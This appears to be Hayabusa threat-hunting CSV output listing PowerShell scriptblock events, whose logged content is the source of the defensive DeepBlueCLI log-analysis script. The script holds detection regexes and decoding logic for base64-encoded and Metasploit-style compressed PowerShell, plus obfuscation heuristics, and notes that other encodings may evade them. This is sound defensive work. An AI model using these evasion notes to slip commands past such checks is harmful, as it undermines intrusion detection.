$csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } } function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. # Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname } function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter } function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. $decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" } function Check-Regex($string,$regexes,$type){ $regextext="""" # Local",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:22:37.536 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"<# .SYNOPSIS A PowerShell module for hunt teaming via Windows event logs .DESCRIPTION DeepBlueCLI can automatically determine events that are typically triggered during a majority of successful breaches, including use of malicious command lines including PowerShell. .Example Process local Windows security event log: .\DeepBlue.ps1 .\DeepBlue.ps1 -log security .Example Process local Windows system event log: .\DeepBlue.ps1 -log system .\DeepBlue.ps1 """" system .Example Process evtx file: .\DeepBlue.ps1 .\evtx\new-user-security.evtx .\DeepBlue.ps1 -file .\evtx\new-user-security.evtx .LINK https://github.com/sans-blue-team/DeepBlueCLI #> # DeepBlueCLI 0.2 Beta # Eric Conrad, Backshore Communications, LLC # deepblue backshore net # Twitter: @eric_conrad # http://ericconrad.com # param ([string]$file=$env:file,[string]$log=$env:log) function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. $pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } ElseIf ($event.id -eq 4104){ # This section requires PowerShell command logging, which is not the default with # event 4104 (logs the script block but not the command that launched it). # # Add the following to \Windows\System32\WindowsPowerShell\v1.0\profile.ps1 # $LogCommandHealthEvent = $true # $LogCommandLifecycleEvent = $true # # See the following for more information: # # https://logrhythm.com/blog/powershell-command-line-logging/ # http://hackerhurricane.blogspot.com/2014/11/i-powershell-logging-what-everyone.html # # Thank you: @heinzarelli and @HackerHurricane # # The command's path is $eventxml.Event.EventData.Data[4] # Blank path means it was run as a commandline. CLI parsing is *much* simpler than # script parsing. # This ignores scripts and grabs PowerShell CLIs if (-not ($eventxml.Event.EventData.Data[4].""#text"")){ $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 500 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } } function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. # Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname } function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter } function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. $decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" } function Check-Regex($string,$regexes,$type){ $regextext="""" # Local",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:22:37.536 +00:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:22:37.536 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,"variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext } function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} } function Remove-Spaces($string){ # Changes this: Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # to this: Application: C:\Program Files (x86)\Internet Explorer\iexplore.exe $string = $string.trim() -Replace ""\s+:"","":"" return $string } . Main",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:22:37.536 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext } function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} } function Remove-Spaces($string){ # Changes this: Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # to this: Application: C:\Program Files (x86)\Internet Explorer\iexplore.exe $string = $string.trim() -Replace ""\s+:"","":"" return $string } . Main",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:22:37.539 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. $pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } ElseIf ($event.id -eq 4104){ # This section requires PowerShell command logging, which is not the default with # event 4104 (logs the script block but not the command that launched it). # # Add the following to \Windows\System32\WindowsPowerShell\v1.0\profile.ps1 # $LogCommandHealthEvent = $true # $LogCommandLifecycleEvent = $true # # See the following for more information: # # https://logrhythm.com/blog/powershell-command-line-logging/ # http://hackerhurricane.blogspot.com/2014/11/i-powershell-logging-what-everyone.html # # Thank you: @heinzarelli and @HackerHurricane # # The command's path is $eventxml.Event.EventData.Data[4] # Blank path means it was run as a commandline. CLI parsing is *much* simpler than # script parsing. # This ignores scripts and grabs PowerShell CLIs if (-not ($eventxml.Event.EventData.Data[4].""#text"")){ $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 500 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= 